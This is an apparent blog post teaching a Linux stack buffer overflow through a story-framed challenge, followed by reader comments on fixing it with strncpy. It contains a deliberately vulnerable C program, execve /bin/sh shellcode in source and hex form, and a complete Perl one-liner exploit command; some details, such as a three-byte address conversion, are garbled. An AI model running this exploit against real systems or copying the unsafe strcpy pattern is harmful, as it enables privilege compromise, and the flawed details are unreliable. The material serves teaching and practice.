Hello there! I've been working in several projects this summer, but in between I practised a bit about exploiting in Linux as a part of cybersecurity warm up. I even shared an exploiting challenge with my Mastodon followers. I think you guys might find it interesting so I decided to write about it.
Introduction
First of all, what's Linux exploiting? Oh well. When we talk about "exploit" we mean to take advantage of a vulnerability to compromise a system, entering on it. In this case I'm focusing on Linux.In this specific case, is quite recommended to be familiar with Linux systems, Perl, C and Assembly. Let's get to it.
Stack Overflow
We're all familiar with the term, as many of us check in the page to solve our programming doubts. But before that, is a programming nightmare caused by an incorrect buffer handling. In the late 80's, "The Internet Worm" (based on this method) made a mess with thousand of computers. Even though it's not as common attack today, it still works in some cases. For explaining the most basic case, I'm going to introduce the story I made for the Mastodon Challenge.
Kyle is a very nice sysadmid that created a C script which salutes him every morning. He even shared it on gitlab with his colleges. He used it that much that he created and alias for executing the main goodmornign program. But the company suffered an attack starting in Kyle's computer and agent Ophelia tries to investigate on it to save Kyle and to discover the real attacker. Kyle showed the code, called goodmorning, to Ophelia:
#include <string.h>
#include <stdio.h>
void func(char *arg) {
char name[32];
strcpy(name, arg);
printf("\nWelcome at work, master %s\n\n", name);
}
int main(int argc, char *argv[]){
if ( argc != 2 ){
printf("Use: %s NAME\n",argv[0]);
//exit(0);
}
func(argv[1]);
printf("Good luck today.\n\n");
return 0;
}
In the story, Ophelia -triggered by the fact you have to enter your name- tries the following line on her computer: ./goodmorning AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA which returns a segmentation fault.
This was the first clue that indicated the challenge was exploiting. Why does that return segmentation fault? If we take a look at "name" character variable in the code we can see Kyle thought no one would use more than 32 characters for the name.
...
char name[32];
...
Therefore, when using more than 32 characters as a parameter (in this case AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) it will return this segmentation fault. This seems to be harmless, but as a vulnerability could scale to something important. If we properly understand memory allocation in programming (C is a very good language if we are taking special care of this) we know that each individual core will execute instructions one by one, and that's why we need IP register: to properly organize the instructions in the execution. When executing a Linux program, it has an structure in the memory divided by areas. This could be checked using size. Anyway! Let's now jump to Assembly. We are going to focus on EBP (frame pointer) and EIP (instruction pointer), which points to the first byte of the next instruction to be executed and ESP (stack pointer) which points to the most-recently pushed value on the stack. Now if we manage to change EIP we will be able to manipulate the flow of the program. We will then introduce something called "shellcode" or an attack to get in the system. We want to execute a shellcode (in hex) that give us admin permission before finishing, like this:
void main(){
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
Going back to the story, agent Ophelia got the ESP by trying several times a script she made, until finally getting " 0x08048444".
We can get the proper hex format using in Python (for example):
hexnum = 0x08048444
print(hexnum.to_bytes(4, 'little'))
We will get \x84\x04\x08. Now we have to use it all at once for our attack. We will introduce the attack in the vulnerable "name" variable, so, it the normal goodmorning execution should be:
$ ./goodmorning Kyle
we will be using:
$ ./goodmorning `perl -e 'print "\x31\xc0\x50\x68\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80"."AAAAAAAAAAAAAAAAAAAAA"."\x84\x04\x08"'`
In this case I accepted as the first part any script that would be considered to compromise the security of the system, in this case \x31\xc0\x50\x68\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80 is just the shellcode above.
This way Ophelia knew how the attacker used Kyle's routine to attack a system, compromising the alias, changing it with a script that executed it but used the shellcode as a parameter instead.
Aaaand that's all. That's the deal! I hope you guys liked it.
Oldest comments (6)
Great post, Paula! Thanks for writing it!
Thank you! I'm grad you enjoyed.
Thank you very much for your sharing, do you know how can it be fixed?
Specifically with C, buffer overruns such as Kyle's are a well-known error. In this case, the problem could be solved by calling strncpy() rather than strcpy(), which allows the program to limit to copying a maximum of 32 characters.
Also, teach Kyle to use lint and/or other code checking tools to find these sorts of mistakes.
An arguably better solution would be to teach Kyle to use a couple lines of shell script instead of writing C code for something this trivial. Of course, every language has its security problems, so this is really just changing problems rather than solving them.
@tanjent , thank you for your feedback, I agree with you each language has their security issues, the most important thing is how to solved them :)
thank you! I couldn't possibly answer better. Poor Kyle, though, you are being too hard on him hahaha